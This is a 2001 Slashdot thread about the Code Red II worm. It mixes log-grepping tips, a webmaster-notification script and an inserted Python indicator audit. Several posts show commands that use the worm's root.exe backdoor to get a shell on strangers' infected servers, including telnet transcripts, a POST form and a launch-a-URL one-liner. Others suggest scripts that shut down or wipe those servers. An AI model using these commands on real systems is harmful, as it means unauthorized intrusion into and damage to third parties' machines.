    Cleaning a compromised box should really be done by reformatting. Although logging is left on for the new virtual directories created (meaning you'd see access in your IIS logs), there's really no way to be sure that files haven't been implanted to leave other backdoors (not as part of this worm, but as part of the use of the opening it creates).

    Credits:

    The bulk of the analysis was done by Nick Fitzgerald of Virus-L (and friends) and Roger Thompson of TruSecure. Additional help came from Bruce Hughes of the ICSA Labs.

    Cheers,
    Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

    1. Re:Breakdown of the new "features" of CRII by SCHecklerX · · Score: 2
      Hi Russ,

      Since when does TruSecure and ICSA Labs make official statements via slashdot? I sure hope you talked to some people before you posted this.
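      An added host-side check for the indicators this post lists (example written here, not Russ's, TruSecure's or ICSA's code): root.exe copies in the two script directories, an Explorer.exe in the drive roots, a non-zero SFCDisable, and the C/D virtual roots. The file and registry probes are passed in as callables so the same checks can be run against a snapshot off the box; on Windows the defaults use os.path and winreg. Checking the slash-prefixed value names (/C, /D) as well as the plain ones is an assumption beyond what the post states.

```python
import os
import sys

# Locations the post says the worm touches (drive D: is tried even if absent).
DRIVES = ("C:", "D:")
ROOT_EXE_DIRS = (r"\inetpub\scripts", r"\program files\common files\system\msadc")
TROJAN_SIZE = 8192  # size of the dropped Explorer.exe according to the post
WINLOGON = (r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "SFCDisable")
VROOTS = r"SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots"
# The post names the virtual roots "C" and "D"; the slash-prefixed forms are
# checked too (assumption: IIS may store the name with a leading slash).
VROOT_NAMES = ("C", "D", "/C", "/D")


def file_size(path):
    """Size of a file in bytes, or None when it does not exist (live probe)."""
    try:
        return os.path.getsize(path)
    except OSError:
        return None


def reg_value(key_path, name):
    """One value under HKLM, or None when absent. Only meaningful on Windows."""
    if not sys.platform.startswith("win"):
        return None
    import winreg  # imported here so the module still loads on other platforms
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
            return winreg.QueryValueEx(key, name)[0]
    except OSError:
        return None


def audit(file_size=file_size, reg_value=reg_value):
    """Return human-readable findings; an empty list means none of the post's
    indicators were seen. Pass callables that read a snapshot (registry export,
    file listing) to audit a box that is no longer online."""
    findings = []
    for drive in DRIVES:
        for directory in ROOT_EXE_DIRS:
            path = drive + directory + r"\root.exe"
            if file_size(path) is not None:
                findings.append("cmd.exe copy present: " + path)
        path = drive + r"\Explorer.exe"
        size = file_size(path)
        if size is not None:
            note = " (%d bytes)" % size
            if size == TROJAN_SIZE:
                note = " (%d bytes, matches the dropped trojan)" % size
            findings.append("Explorer.exe in drive root: " + path + note)
    sfc = reg_value(*WINLOGON)
    if sfc not in (None, 0):
        findings.append("SFCDisable = %r (Windows File Protection may be off)" % (sfc,))
    for name in VROOT_NAMES:
        target = reg_value(VROOTS, name)
        if target is not None:
            findings.append("IIS virtual root %s -> %r (exposes a drive root)" % (name, target))
    return findings


if __name__ == "__main__":
    for line in audit() or ["no Code Red II indicators found"]:
        print(line)
```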

  94. Re:Easier to track the source now? by J'raxis · · Score: 2

    Nah, that was just the first occurrence on your subnet. It had to get there somehow. Even though this thing is concentrating on subnets, it must branch out or otherwise it wouldn't've propagated outside the subnet it started on. I'm seeing it on 66; others are reporting it on 4, 24, and more.

  95. Re:logs by mashy · · Score: 2

    I wrote a crude script that does this but mails information to abuse departments of ISPs where they can match up the hosts with their users and contact them if they wish. The parent poster may want to add this feature to his code, and I might clean my code up later and post it.

  96. Re:what is code red. . by mpe · · Score: 4, Funny

    Someone should copyright the "code red algorithm".

    Or maybe patent it. Also how about sending the BSA after anyone running it without a licence.

  97. Re:Something that should happen more often. by Malcontent · · Score: 2

    Considering that Apache is the most widely used web server you'd think it would be attacked more. OK maybe the apache folk are nice and ethical people who don't call people communists or un-american and therefore don't piss off as many people but still a kiddie is not that selective.

    --

    War is necrophilia.

  98. Re:If this can't break Microsoft's back nothing wi by cyberdonny · · Score: 2
    > The genuine 8-Ball . Mysticism on demand!

    Just tried it. The question I asked was "will code red ii sink microsoft". The answer was... guess what...no, not that one, we're talking about Code Red here, not Sircam.

    It was: "Most likely".

  99. Re:URM. Thjs is NOT good. GG Microsoft by Greyfox · · Score: 2
    There seems to be a happy little program called iisreset:

    http://support.microsoft.com/support/kb/articles/Q202/0/13.ASP

    May I suggest iisreset /stop?

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  100. Re:the real kicker is by Simon+Brooke · · Score: 2

    You know, you're missing the point. A well set up UN*X box takes very little administration. The cost of administering a UN*X box will normally be lower than a Windows box doing the same job, because although the administrator costs more, you need h[im|er] for fewer hours.

    --
    I'm old enough to remember when discussions on Slashdot were well informed.
  101. POSTing to root.exe? by nebby · · Score: 2

    Has anyone figured out how to execute commands using a POST request to root.exe? My curiosity (heh heh :)) has made me play with it a bit (but not too much, don't want the feds knocking on my door asking me what the phrase "Hacked by Chinese!" means to me) .. I can't seem to figure it out.

    I tried variants of the following:
    <HTML>
    <BODY>
    <FORM METHOD="POST" ACTION="http://xx.xx.xx.xx/scripts/root.exe">
    <INPUT TYPE="SUBMIT" NAME="" VALUE="exit&#13;&#10;">
    </FORM>
    </BODY></HTML>

    trying to send exit to the shell, but the "script" (root.exe) never finishes. I'm guessing that the data is coming over the pipe but lynx won't show it to me until the request is finished. I tried passing the NAME %1, %2, etc. (DOS style) but that didn't work either.

    As soon as I get a directory listing I am going to have a moment of silence for all these poor fucks.

    --
    --
    1. Re:POSTing to root.exe? by GC · · Score: 2

      Very nice advice:

      Here is a oneliner:

      Usage popup

      #!/bin/sh
      echo "GET /scripts/root.exe?+/c+start+http://www.digitalisland.com/codered/ HTTP/1.0" | telnet $1 80

      Now how do I get it to tail my apache log and automatically run?

  102. Re:If this can't break Microsoft's back nothing wi by meta-monkey · · Score: 3, Funny

    WHY do i have to pay extra for the functionality of NOT being susceptible to virii and net attacks?

    Actually, you don't. Linux is free :-p

    --
    We don't have a state-run media we have a media-run state.
  103. Re:Proposal for White Hat'ing CR][ by geomcbay · · Score: 2
    You might want to keep in mind that any scripts you write to fix compromised Code Red servers will technically be hack attempts (you will be accessing computer systems you are not authorized to access).

    Despite the best intentions you will be breaking the law. Keep that in mind.

  104. Nothing new by isorox · · Score: 2

    Several of us in #ljr on openprojects.net have being getting this for ages.

    I'm getting one attack about every 20 minutes, most are from servers that don't have anything on, although I've had a couple of "real" websites attack me.

    http://isorox.dyndns.org/~iso/ is a monitoring thing.

  105. Re:the real kicker is by clifyt · · Score: 2

    I'm going to have to defend the guy as I run Windows as well.

    In Depth Knowledge of FP2000 - Any of ya'll actually use this crap? I can't figure it out. I have clients that do EVERYTHING in FP and on occasion I'm called in to help them out. I COULD tell them to pick up Dreamweaver, but most are unwilling to pay for it...they use FP as it came bundled. I COULD tell them how to do everything from notepad and then how to set up an FTP connection through the cli, but if I did that I wouldn't be working for them. I wish I knew how people used this piece of crap software as I've never been able to get it to do crap for me, yet idiots seem to figure it out enough to connect to their servers and screw up pages. In this sense, ya use what the client is using...if you don't you aren't much of a consultant.

    Same goes with Windows. I tell all my users that I can set up *nix boxes for their networks. This would be really fricken cool IF I was on site more than an hour or two a month. These guys all want to admin their own servers and to be honest, the costs saved by doing it themselves far outweigh the cost of getting zapped by any of the worms - so far - for a small business. If you can't afford a full time WinAdmin, you certainly can't afford a full time UnixAdmin.

    WinAdmins are a dime a dozen and EVERYONE knows enough to be able to set these damn things up. Most businesses I deal with have a semi-dedicated winadmin who is part network assistant / mostly something else. It's something I can show a business how to do in an afternoon with a few small books left in case they need them.

    On the other hand, I have a thousand page UNIX book that I still consider a starter's guide that I've used for over 10 years now - "UNIX System V Release 4 - An Introduction" and it doesn't even cover things like Apache or SendMail in depth (or at all...I can't remember...I got enough other books on those subjects). It's a fricken introduction for christ's sakes. I could have gotten a few MCSE's from a book that size.

    So fuck it...if ya'll want to play the assholes and be all high and mighty about how 'l33t ya'll are go ahead. It's exactly the reason you had no friends in high school. Geeks think they are always right and everyone else is wrong. It's the same attitude the jocks had, but worse.

    I HATE M$ and I wouldn't suggest using it to anyone, BUT if someone suggests it to me, I'm going to give them the best service I can on that platform and I'm not going to turn my nose up at them. And YES, I did get hit by RedCode last time and this was after doing everything M$ said to do...Oops, apparently if you make any changes to the system AFTER you've done these, certain things will reenable all the changes you've made. I've now got a system where my boys have to go through a tedious procedure ANYTIME they [install / uninstall / reconfigure] anything on my WinServers to ensure that nothing was undone. To be honest, it wouldn't be a bad practice on *nix to do the same thing and reaffirm all patches / etc stayed intact after installs. With the new RPMs (ok they are new to me...I'm used to installing with a MAKE) you don't know what the hell is being upgraded or what dependencies are being imported a good deal of the time.

    Shit, anymore it's almost simpler than Winders...rpm some app and find they've rewritten your secured files with something wide open and the win boys will be laughing at all you dumbass linux people...now who'd CLI over an app without knowing what was on it?

  106. Re:Now that is funny! by billh · · Score: 3, Funny

    Look at his street address...

  107. 436 attempts so far by Teferi · · Score: 2

    @Home is indeed apparently getting hit hard.

    --
    -- Veni, vidi, dormivi
  108. Re:If this can't break Microsoft's back nothing wi by tswinzig · · Score: 2

    The licensing issue is irrelevant too. If my microwave catches fire, I can sue somebody. If my custom-built house collapses, I can sue somebody. If my shotgun explodes, I can sue somebody.

    First of all, the question is not IF you can sue SOMEBODY. You can ALWAYS sue somebody. The question is, does your case stand a chance in hell of being won?

    Secondly, who would we sue if Linux was found to have a serious flaw like the one in IIS? Don't you dare say the flaw would be fixed, because the flaw in IIS has already been patched, about 2 months ago, well before Code Red came out.

    --

    "And like that ... he's gone."
  109. Re:I'm getting pounded at 216. by Saint+Aardvark · · Score: 2

    Cancel my above comments -- in the twenty minutes since starting up Apache, I've logged 7 unique IPs all in 216., all CRII.

  110. Re:logs by Darth+Paul · · Score: 2, Informative

    careful - the new strains use default.ida?XXXXXXX. Just grepping for default.ida should be enough...

  111. Re:cisco 675 hanging. by Uller-RM · · Score: 2

    Turning the web server off is not enough - it will still crash it. Your only course of action is to either:

    1) Contact your ISP, have your connection changed to a static IP if it isn't already, and use RFC1483 bridging.

    2) Upgrade to version 2.4.2 of the CBOS firmware.

  112. Re:Why don't they... by aozilla · · Score: 2

    it fights fire with fire but its still illegal.

    It fights fire with water... A fire in someone else's house... Which would have set your house on fire too, except it's made of fireproof material (or you have a "firewall" between your houses).

    May or may not be legal when you look at it that way. I'm pretty sure you can legally break into someone's house if you see flames coming out of the roof.

    --
    ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
  113. Re:logs by JediTrainer · · Score: 2

    Holy shit! I just ran that against my logs, and I've got 493 so far!

    Good thing I'm running Apache :)

    --

    You can accomplish anything you set your mind to. The impossible just takes a little longer.
  114. Re:C:\dos C:\dos\run | run\dos\run by ananke · · Score: 2, Informative

    according to ntbugtraq, the worm copies cmd.exe to the scripts dir under iis. i've been getting a lot of these now in my snort log:

    [**] [1:1002:1] WEB-IIS cmd.exe access [**]
    [Classification: Attempted User Privilege Gain] [Priority: 8]
    08/04-20:59:21.340539 165.247.90.38:3711 -> 165.247.246.23:80

    from different ip's etc.

    --
    --- d'oh
  115. Re:logs by Kryptolus · · Score: 5, Informative

    For those who are interested in the source:
    http://www.kryptolus.com/red.txt

    On another note, a server whose identity I will not name (Solaris w/ Apache) was hit with 17000 attacks as of yesterday (the server handles a lot of IPs).

    --

    --
    Violators will be prosecuted and prosecutors will be violated.
  116. Re:Hypothesis by cyberdonny · · Score: 2
    It can only get better... I'm already looking forward to Code Red III, to be released on the second anniversary of the Red Hat IPO.

    Who knows, maybe now is the time to buy some RHAT stock again... Indeed, people will need another OS once they've thrown out MShit.

  117. Re:logs by Saint+Aardvark · · Score: 2
    I've said it before, I'll say it again:

    Mail those logs!

    From http://dshield.org/codered.html:

    As you have probably heard, the Code Red worm has infected over 100,000 machines running Microsoft IIS, and the total is rising. We need to identify the infected machines so that the owners of these machines can be notified so that they can be fixed. We are appealing to DShield submitters to do a special one time only submission for log entries that contains this information.

    Linux and other *NIX users Can do this by changing to the directory where your web server logs are located and executing a script like this:

    grep 'default.ida?NNNNN' access_log | mail -s 'APACHE' redalert@dshield.org

  118. Re:Something that should happen more often. by tswinzig · · Score: 3, Redundant

    Ha ha, that was funny! Of course we know worms never infect unix or open source systems !

    --

    "And like that ... he's gone."
  119. Attempts here by spinfire · · Score: 2, Informative

    I've compiled a list of IPs that have made 404 hits on default.ida. Companies like @home and speakeasy (my ISP) need to crack down on IIS users on home DSL networks and get them to install the patch. This many infected hosts is not a good thing.

  120. Re:Why don't they... by david+duncan+scott · · Score: 2

    Yes, and it would be especially funny if, like Robert T. Morris Jr. before you, you weren't quite as smart as you thought.

    --

    This next song is very sad. Please clap along. -- Robin Zander

  121. Mountain Dew by Speare · · Score: 2

    All this comes at a bad time for Mountain Dew's new fruity flavor, called Code Red, too.

    First month it's on the market, and the brand new trademark is sullied by bad references to computer hacking, worms, viruses and international disputes. Is there truly "no bad publicity"?

    Of course, like the word 'spam' and the Hormel product SPAM(tm), trademark law rightfully doesn't support serious legal implications, and wouldn't stand a chance against mob inevitability even if it did. Just kinda funny to watch it happen.

    --
    [ .sig file not found ]
    1. Re:Mountain Dew by Fishstick · · Score: 3, Informative

      >sullied by bad references to computer hacking

      This doesn't appear to be the case, at least not in the convenience store located in my building at work. Hearing the reference to the new soda 'popular with hackers' in the news report about the worm, I looked it up on Pepsi's website (having never heard of it).

      When I discovered that it was a Mountain Dew flavor, I decided to wander downstairs to see if the guy had it in, and to possibly check it out.

      "No, it is all gone... should have some more it by Monday."

      Stopped at the local Dominick's yesterday where it was the same story. If anything, the worm has generated free publicity, seemingly resulting in a run on the product in the Elk Grove/Schaumburg/Palatine suburban area.

      Remember, there is no such thing as "bad" publicity, right?

      --

      There is much cruelty in the universe, John.
      Yeah, we seem to have the tour map.

  122. Re:Bookmarklet for IIS detection? by Simon+Brooke · · Score: 2

    Here it is (I did this quite a while ago)

    javascript:void(window.open( %22http://www.netcraft.co.uk/whats/?host=%22 + window.location))

    On the same subject, check HTML validity:

    javascript:void(window.open( %22http://validator.w3.org/check?uri=%22 + window.location))

    ... CSS validity...

    javascript:void(window.open( %22http://jigsaw.w3.org/css-validator/validator?uri=%22 + window.location))

    ... links ...

    javascript:void(window.open( %22http://www.htmlhelp.com/tools/valet/linktest.cgi?url=%22 + window.location))

    ... bookmarklets are fun!

    --
    I'm old enough to remember when discussions on Slashdot were well informed.
  123. While you're at it... by jeffsenter · · Score: 2

    Why don't you make it Code Red Hat... the worm finds machines infected and then reformats them and installs Redhat. That would take care of the MS infinite bug problem.

    Seriously though it should be Microsoft releasing a antidote virus that cleans up all their crappy infected servers. It seems like Microsoft is allowing this to continue because they get a ton of free media coverage... any publicity is good publicity.

  124. If this can't break Microsoft's back nothing will. by cybrthng · · Score: 3, Insightful
    If there isn't one thing that can break the straw nothing will.

    I'm warned that smoking and drinking are bad for my health

    Medicines and drugs aren't legal unless they're fully tested and approved

    My car doesn't lock up and freeze

    My microwave doesn't blue screen and cook my brain inside out.

    SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be susceptible to cracks and attacks that are easily preventable.

    WHY do i have to pay extra for the functionality of NOT being susceptible to virii and net attacks?

    WHY doesn't microsoft NOTIFY me of the risks of using its OS?

    I hope no one's bank is trusting microsoft, i hope anyone doing online transactions don't trust microsoft. I hope no one keeps personal, private, confidential and financial data on their PCs.

    I hope no one running Windows is on the internet for that matter.

  125. Re:MSNBC Coverage by baptiste · · Score: 3, Informative
  126. C:\dos C:\dos\run | run\dos\run by mcleodnine · · Score: 5, Informative

    Seeing a lot of "XXXX" and far fewer "NNNN" in the logs. This version appears to stay crunchier in milk than the first. Up to 25-30 per hour, from 10 this afternoon. The 24.x.x.x may be getting slammed, but I can see another that is just as bad.

    Snipped from incidents dot org (emphasis added)
    Both Henk Wevers and corecode submitted packet traces of the complete request as shown below. Comparing this trace with the original Code Red (see the Code Red Infection Illustrated section of the July 23 Handler's Diary at: http://www.incidents.org/diary/july2001.php) it is immediately obvious that we are dealing with a new worm. Note that line 820 shows that the worm is doing something with CMD.EXE; also the dump contains the string 'CodeRedII' on line 230. Note the references to root.exe on lines 840 and 880.

    Article also mentions that it appears the compromised servers are backdoored and rooted. Ouch.

    The editorial accusations of crying wolf might look a little pale this evening...

    --
    one better than mcleodeight
  127. Re:@home problems... by sharkey · · Score: 2

    I'm getting rapidly poked here in Indy, connected to Comcast@HOME. They've gone off the net for more than an hour after 22:00 EST the last few nights. I don't know if the outages are from CodeRed I or II, or from @HOME's usual technical competence.

    --

    --
    "Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
  128. Never name a virus by the name its author intended by cyberdonny · · Score: 3, Insightful
    From the article:

    In particular, the fact that it has "CodeRedII" inside means that it couldn't possibly be the original worm -- the name wasn't attached until after it was released.

    If this beast is truly wicked, it will scan assorted websites such as Slashdot, Wired, etc, and as soon as it will see talk about itself it will enter its active phase...

  129. URM. Thjs is NOT good. GG Microsoft by nyet · · Score: 2


    $ telnet x.x.x.x 80
    Trying x.x.x.x...
    Connected to x.x.x.x.
    Escape character is '^]'.
    GET /scripts/root.exe HTTP/1.0
    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Aug 2001 05:51:06 GMT
    Content-Type: application/octet-stream
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-1999 Microsoft Corp.
    c:\inetpub\scripts>

    Game over man, game over.

  130. Broken random number generator (again!) by cperciva · · Score: 2

    It looks like someone has a broken random number generator again.

    At least, that's the only explanation I can see for the fact that out of 250 attacks I've seen so far, 47 came from the same source IP. Admittedly, it being in the same /16 I'd expect to see more attacks from it, but unless it scans the entire /16 every 5 seconds I think it is a sign of a broken random number generator.

    Come on guys, if you're going to try to bring down the internet, at least do it right!

  131. Tomorrow's writeups today! ;) by Scoria · · Score: 2

    !!! CODE RED 2 !!!
    Steve Gibson of Gibson Research Corporation

    Greetings,

    As I said in my last warning, the Internet had *NOT* seen the last of the Code Red virus. The threat of a dangerous, Internet-wide infection is dangerous and real, made even worse by Microsoft Windows XP's *built-in* support for RAW SOCKETS.

    Microsoft does not understand the *BLATANTLY OBVIOUS* danger presented by RAW SOCKETS left to the hands of their users. After all, any PERSONAL COMPUTER which utilizes Windows XP (and its EXTREMELY DANGEROUS RAW SOCKETS) will be infected by a Code Red variant sometime in the future! It is *INEVITABLE.*

    With the new "features" of Code Red 2, such as the backdoor created by it, any 13 YEAR OLD SCRIPT KIDDIE could take down the entire Internet by starting a random DDoS attack from random IPs to random ports on other random IPs using malicious code similar to that contained in the Code Red virus!!!

    ***IMAGINE THE CHAOS. THE THREAT IS REAL...***
    I REPEAT, THE THREAT IS REAL.

    IMAGINE WHAT OTHER VULNERABILITIES COULD BE DISCOVERED IN MICROSOFT'S WINDOWS DDoS XP BEFORE RELEASE! WHEN THEY ARE FOUND, EVERYONE KNOWS I'LL BE THERE TO SAY "I TOLD YOU SO!"

    --
    Do you like German cars?
  132. The beginning of the end of free rides... by pongo000 · · Score: 2

    ...on @home for those who run small, low-bandwidth http servers. Most of the attacks on my Apache box have been from the 65.x.x.x subnet belonging to @home. I suspect @home will start scanning for open 80 ports, much as they did with port 119 when @home received the USENET death penalty.

  133. Re:A few more details:It's a root trojan by lalleglad · · Score: 2, Interesting

    OK, I tried this on a couple of the hosts that I have in my access logfile, but after a few successful attempts it got boring.

    I wonder what I can do after getting the prompt? After I get:

    c:\inetpub\scripts>

    I don't know what to do, but I would like to send an email to the webmaster telling him to stop letting his server send me crap, however I have tried 'dir' and 'cd' which I thought were simple commands, but the link then seems to be stuck, ie. nothing happens.

    If anyone has info about what can be done there I'd like to hear.

    An email from his own machine by someone else ought to scare him to DO something about it!

  134. Re:logs by ConsumedByTV · · Score: 2

    post the perl script? I would be very thankful :)

    --


    "Not my manner of thinking but the manner of thinking of others has been the source of my unhappiness." - M
  135. Re:But does it actually *do* anything different? by ryanr · · Score: 2

    It installs a back door. (As indicated in the link referenced.)

  136. And the depressing thing is... by Simon+Brooke · · Score: 3, Interesting
    I wrote the following shell script to mail webmasters on infected hosts:
    #!/bin/bash

    # OK: the rationale behind this is that it will look up the name of each host
    # which probes us with the Code Red style probe, and then see whether that
    # name resolves back to the number. If it does there's some hope that it's a
    # real host, so we'll try to mail webmaster@

    log=$HOME/codered.log
    touch "$log"    # otherwise the very first grep fails because the log file does not exist yet

    for ip in `grep default.ida /var/log/httpd/access_log | awk '{print $1}' | sort -u`
    do
        # -F takes the dots literally and -x matches the whole line, so 10.1.1.1
        # is no longer "found" inside 110.1.1.10
        if ! grep -qxF "$ip" "$log"
        then # it's not there
            echo "$ip" >> "$log"    # remember so we don't mail them again
            valid=""                # clear the result left over from the previous host

            # +short prints just the PTR name (with a trailing dot, stripped here)
            host=`dig -x "$ip" +short | head -1 | sed 's/\.$//'`

            echo -n "Seen $ip [$host]"

            # the pattern on its own also matched an empty name, so require one
            if [ -n "$host" ] && echo "$host" | grep -qi '^[a-z0-9.-]*$'
            then
                echo -n "...appears to be valid..."

                valid=`dig +short "$host" A | head -1`
            fi

            if [ "$ip" = "$valid" ]
            then
                mail -s "Your machine appears to be infected by Code Red" \
                    "webmaster@$host" <<EOF

    Dear Webmaster

    We have received a request for 'default.ida' from your server at
    $ip. This is usually an indication that you have been
    infected by the 'Code Red' or 'Code Red II' worm, currently
    attacking Microsoft IIS servers. To secure your server, download
    and install the appropriate patch from Microsoft


    * Windows NT 4.0:
    http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833

    * Windows 2000:
    http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800

    Or, better still, switch to a proper operating system
    EOF
                echo " ...mailed"
            else
                echo " ? not valid?"
            fi
        fi
    done

    I've been hit by 61 different unique IP's today, of which 17 had IPs which resolved to addresses which resolved to the same IPs. So how many of my mails were actually accepted for delivery?

    That's right, none.

    --
    I'm old enough to remember when discussions on Slashdot were well informed.
  137. Re:Why are unix hosts getting hit so hard with thi by Saint+Aardvark · · Score: 2

    I suspect that mainly it's cos 1) this is a pretty UNIX-heavy forum, and 2) grepping logs and such is easier/more common in Unix than in MSLand.

  138. Re:Something that should happen more often. by Malcontent · · Score: 2

    I guess it depends on your choice of apps doesn't it. I use apache, proftpd, djbdns, and qmail (I don't run a news server). As far as I know there was a hack of proftpd in the last couple of years, an apache hack and nothing on qmail or djbdns. So a couple of the apps I used needed to be updated at least once in the last year. Not too bad if you ask me especially considering apt-get upgrade and apt-get update are so easy to perform. Lucky for me I have literally dozens of high quality open source apps to choose from to run my services. I think I made the right choices by and large.

    All in all I would put up the record of my apps against MS suite any day.

    --

    War is necrophilia.

  139. Ooops bad paste. Take two. by nyet · · Score: 2


    $ telnet x.x.x.x 80
    Trying x.x.x.x...
    Connected to x.x.x.x.
    Escape character is '^]'.
    GET /scripts/root.exe
    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Aug 2001 05:51:06 GMT
    Content-Type: application/octet-stream
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-1999 Microsoft Corp.
    c:\inetpub\scripts>

    1. Re:Ooops bad paste. Take two. by cyberdonny · · Score: 2

      Wow, this does indeed work! But where do you get from there? Typing dir at the prompt seems to do nothing at all. Even using GET /scripts/root.exe?dir HTTP/1.0 does not work as expected.

  140. Re:If this can't break Microsoft's back nothing wi by nicodaemos · · Score: 3, Interesting

    This won't break Microsoft's back .... consumers voting with their feet can only achieve that end.

    Recently I was looking around for a new insurance company. Looking on the web I came across a couple of companies who would give me a quote if I provided them with some personal information. I was all set to deal with one site, whom I won't name, but I decided to first do a quick background check on them. Using netcraft I was able to tell they were running their site on IIS. That little bit of info told me that they weren't at all serious about keeping my personal information confidential.

    Of course I decided not to pursue any business with them. But I also went a step further. I wrote them a quick email informing them that I would never do business with a company who was choosing to base their internet business on the most hacked application platform on the internet.

    Let companies know that you won't do business with them if they use inferior products. Your quick and simple message to them will speak more loudly than a thousand rants on various message boards.

  141. Re:If this can't break Microsoft's back nothing wi by IronChef · · Score: 2


    A product that is given away and not sold can, I think, have a reliability disclaimer. But as soon as money is exchanged for goods or services you enter into a social contract. Things you buy shouldn't suck.

  142. Re:A few more details:It's a root trojan by dillon_rinker · · Score: 2

    Wow! I didn't know a command prompt was a GUI!

  143. Re:What about.... by cyberdonny · · Score: 2

    For obvious reasons, the worm is programmed to ignore the 127.0.0.1 netinterface. However, all other interfaces, even 192.168., and 10. are fair game: the reasoning here is that scanning those will allow the worm to infect machines behind NAT routers.

  144. logs by Kryptolus · · Score: 5, Interesting

    automatically generated list of attacks against my server

    147 attacks so far

    the page is generated through a perl script that reads my apache logs

    --

    --
    Violators will be prosecuted and prosecutors will be violated.
    1. Re:logs by interiot · · Score: 2
      gzip -dcf /var/log/apache/* | grep '[NX][NX][NX][NX]'

      Adjust the path to wherever your apache logs are.

    2. Re:logs by Pathwalker · · Score: 2

      Not too many attacks where I am - so far this month I've seen the old worm 91 times, and the new worm only 13 times.

      I'm making a nice graph of the infection attempts over time here. It should be fun to see how long it takes for version 2 to pass version 1.

    3. Re:logs by Saint+Nobody · · Score: 2
      technically you should probably be doing
      grep -E 'NNNN|XXXX'
      so you wouldn't catch "XNNX" and other such variations... not that it would even matter for the most part. i'm just being pedantic.
      --
      #define F(x) int main(){printf(#x,10,#x);}
      F(#define F(x) int main(){printf(#x,10,#x);}%cF(%s))
    4. Re:logs by Saint+Aardvark · · Score: 2

      Crap, you're right....my bad. It's late and I should go to bed, but there's a horrible fascination in watching the comments roll in and seeing what this is doing...

    5. Re:logs by ncc74656 · · Score: 2
      Here's another list of Code Red attacks for your amusement. Apache logs to MySQL here, so I have a script that queries the database and formats the results into a table. The table is then inserted into the HTML with a server-side include. As of this post, I'm up to 972 attacks. Nearly half are from other Cox Express customers, and the total count is about an order of magnitude greater than when I last checked for Code Red activity on Friday.

      I sent out email a while back to the 74 hosts known to be infected at the time. Hopefully a few of them will get a clue and fix their servers. (Then again, if they're running "Internet Infection Server" on publicly-available servers, they must've been clue-deficient to begin with. :-) )

      --
      20 January 2017: the End of an Error.
  145. To see them live by cybermage · · Score: 2, Interesting

    To see them come in live:

    tail -f [log_file] | grep default.ida

    To see just CR2, s/default.ida/default.ida\?XXX/

    I got three while writing this. I was wondering what was slowing things down tonight.

  146. Now that is funny! by stuccoguy · · Score: 5, Funny

    This guy's computer is infected and attacking me every 10 minutes or so. I went to his web page and found this resume which indicates the guy is a Windows2000 expert and Network Technician!

    1. Re:Now that is funny! by gascsd · · Score: 3, Funny

      heh. he lives in my apartment complex, and i know exactly where his apartment is (i have a friend over there on that side of the complex). i'll go tell him his box got 0wN3d then hand him my 4.3R CD =)

  147. a quick fix by Swordfish · · Score: 2, Informative
    Here's a perverse idea for a quick fix for CR2.

    First, see here for how to telnet into the back door left by all CR2 infections. Second, write a script to telnet to all infected hosts which probe you on port 80 and shut down the offending machine. Third, run this script on your web server so that all hosts probing your site get shut down.

    If everyone did this, then CR2 would disappear off the net within 24 hours, and we could all rest easy!

    1. Re:a quick fix by dozing · · Score: 2, Funny

      Wouldn't the best and quickest fix be to telnet into the machines and give 'em the old:
      c:\deltree windows

      maybe we could even install scripts on our own servers to automatically do this each time we receive a new attack. Automated windows repair solutions.

      --
      Dozings.com -- Its kinda funny... If you're as crazy as me.
    2. Re:a quick fix by Malcontent · · Score: 2

      According to the MS web site you don't need "expensive unix sysadmins" to install, configure and run MS servers. They tell their customers that sysadmins are not needed. You can't blame the clueless PHBs of the world when they believe MS can you? It hasn't occured to them that a MS employee who hasn't told ten lies by lunch will automatically be fired.

      --

      War is necrophilia.

    3. Re:a quick fix by Malcontent · · Score: 2

      Who can find anything on that insane web site. I know I have read an interview by an MS executive who said that. That was the talking point a while back when MS was talking up TCO.

      --

      War is necrophilia.

    4. Re:a quick fix by sheldon · · Score: 2

      Where is this statement that "sysadmins are not needed" located on the MS website?

    5. Re:a quick fix by unitron · · Score: 2

      Wandering a little off-topic, how many machines out there have passwords known only to one person who has made no provision whatsoever for anyone else to have access to that password should they suddenly get hit by a bus or a meteorite, have a stroke or a coronary, or vanish in a puff of smoke due to insert your favorite religion here?

      --

      I see even classic Slashdot is now pretty much unusable on dial up anymore.

    6. Re:a quick fix by Saint+Aardvark · · Score: 2

      Heh...there's a guy like that where I work who basically built the whole network. God alone knows what'll happen to us if he gets hit by a meteorite.

  148. Re:CR2 Web Defacements by baptiste · · Score: 2
    Actually, according to the virus analysis on BUGTRAQ and eeye.com, CodeRedII does NOT deface the home page. However, CRv2 (2nd generation of the first Code Red worm, not the same as CodeRedII - got that? :) ) is still in the wild and will deface the main page. Also, the Pobox worm has been around a long time. Or some script kiddies are tossing these pages in using the root backdoor from CRII.

    I tried to post the BUGTRAQ analysis from EEYE, but lameness filter choked on it

  149. Top 8 things to do with Code Red by startled · · Score: 4, Funny

    Bah, what a waste. Screw that, here are some other things you should do along with your white hat program:

    1. Distribute Elcomsoft's e-book reader to all compromised boxes; search for any Adobe e-books and write out a plaintext copy.
    2. Append the code to DeCSS to all Word documents on the box.
    3. Modify the code to only patch the box when Dmitry is finally released from jail.
    4. Install Linux; reboot.
    5. Install BSD; reboot.
    6. Configure box to DoS MS's IIS patch servers; condemn MS for making patches inaccessible.
    7. Script all boxes to respond to /. stories with one of two comments: "dammit, this is a duplicate! Here is the original at goatse.cx", or "Katz iz 4 t00l!!!1@".
    8. Install SETI; add the box to your team; brag about your high score.

    Note: these are jokes. Please, please, do not do these things. Especially because if you do, the feds will come knocking on my door. :)

  150. It's not safe to install IIS while on a network... by weave · · Score: 5, Insightful
